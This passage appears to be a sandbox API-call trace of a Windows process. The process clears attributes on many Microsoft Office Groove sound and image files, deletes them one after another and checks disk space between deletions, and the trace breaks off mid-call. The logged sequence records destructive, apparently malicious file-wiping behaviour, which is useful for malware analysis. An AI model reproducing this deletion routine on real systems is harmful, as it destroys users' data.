[0075.683] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\HICCUP.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\hiccup.wav")) returned 1 [0075.686] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\MMHMM.WAV", dwFileAttributes=0x80) returned 1 [0075.691] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\MMHMM.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\mmhmm.wav")) returned 1 [0075.695] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\SNEEZE.WAV", dwFileAttributes=0x80) returned 1 [0075.705] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\SNEEZE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\sneeze.wav")) returned 1 [0075.708] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\THROAT.WAV", dwFileAttributes=0x80) returned 1 [0075.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\THROAT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\throat.wav")) returned 1 [0075.770] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav", dwFileAttributes=0x80) returned 1 [0075.777] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav")) returned 1 [0075.779] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.779] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.779] CoTaskMemFree (pv=0x506980) [0075.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\ALARM.WAV", dwFileAttributes=0x80) returned 1 [0075.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\ALARM.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\alarm.wav")) returned 1 [0075.794] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\BUZZ.WAV", dwFileAttributes=0x80) returned 1 [0075.802] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\BUZZ.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\buzz.wav")) returned 1 [0075.804] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\LASER.WAV", dwFileAttributes=0x80) returned 1 [0075.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\laser.wav")) returned 1 [0075.816] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV", dwFileAttributes=0x80) returned 1 [0075.824] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav")) returned 1 [0075.828] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV", dwFileAttributes=0x80) returned 1 [0075.838] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav")) returned 1 [0075.842] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV", dwFileAttributes=0x80) returned 1 [0075.850] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav")) returned 1 [0075.853] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV", dwFileAttributes=0x80) returned 1 [0075.860] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav")) returned 1 [0075.863] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.863] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.863] CoTaskMemFree (pv=0x506980) [0075.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.875] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\CAN.WAV", dwFileAttributes=0x80) returned 1 [0075.882] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\CAN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\can.wav")) returned 1 [0075.885] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\COUPLER.WAV", dwFileAttributes=0x80) returned 1 [0075.895] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\COUPLER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\coupler.wav")) returned 1 [0075.900] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.907] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\HORN.WAV", dwFileAttributes=0x80) returned 1 [0075.908] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\HORN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\horn.wav")) returned 1 [0075.911] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOT.WAV", dwFileAttributes=0x80) returned 1 [0075.918] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shot.wav")) returned 1 [0075.921] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOVEL.WAV", dwFileAttributes=0x80) returned 1 [0075.929] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOVEL.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shovel.wav")) returned 1 [0075.933] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV", dwFileAttributes=0x80) returned 1 [0075.941] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav")) returned 1 [0075.944] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV", dwFileAttributes=0x80) returned 1 [0075.950] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav")) returned 1 [0075.953] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.953] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.953] CoTaskMemFree (pv=0x506980) [0075.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.960] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0075.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0075.970] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\calendartooliconimages.jpg")) returned 1 [0075.974] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0075.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImage.jpg", dwFileAttributes=0x80) returned 1 [0075.979] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\createspaceimage.jpg")) returned 1 [0075.985] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0075.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImages.jpg", dwFileAttributes=0x80) returned 1 [0075.989] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\datalisticonimages.jpg")) returned 1 [0075.993] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0075.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImages.jpg", dwFileAttributes=0x80) returned 1 [0075.997] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\dataviewiconimages.jpg")) returned 1 [0076.001] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.006] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimages.jpg")) returned 1 [0076.009] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImage.jpg", dwFileAttributes=0x80) returned 1 [0076.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimage.jpg")) returned 1 [0076.017] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIP.JPG", dwFileAttributes=0x80) returned 1 [0076.024] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIP.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\grip.jpg")) returned 1 [0076.029] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIcon.jpg", dwFileAttributes=0x80) returned 1 [0076.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationicon.jpg")) returned 1 [0076.036] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginDialogBackground.jpg", dwFileAttributes=0x80) returned 1 [0076.045] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginDialogBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logindialogbackground.jpg")) returned 1 [0076.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg", dwFileAttributes=0x80) returned 1 [0076.052] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24images.jpg")) returned 1 [0076.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.060] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimages.jpg")) returned 1 [0076.063] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimages.jpg")) returned 1 [0076.071] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackground.jpg", dwFileAttributes=0x80) returned 1 [0076.077] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackground.jpg")) returned 1 [0076.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg", dwFileAttributes=0x80) returned 1 [0076.085] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackgroundrtl.jpg")) returned 1 [0076.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierCloseButton.jpg", dwFileAttributes=0x80) returned 1 [0076.092] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierCloseButton.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierclosebutton.jpg")) returned 1 [0076.095] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg", dwFileAttributes=0x80) returned 1 [0076.099] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisabledownarrow.jpg")) returned 1 [0076.102] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg", dwFileAttributes=0x80) returned 1 [0076.163] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisableuparrow.jpg")) returned 1 [0076.166] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDownArrow.jpg", dwFileAttributes=0x80) returned 1 [0076.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdownarrow.jpg")) returned 1 [0076.173] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 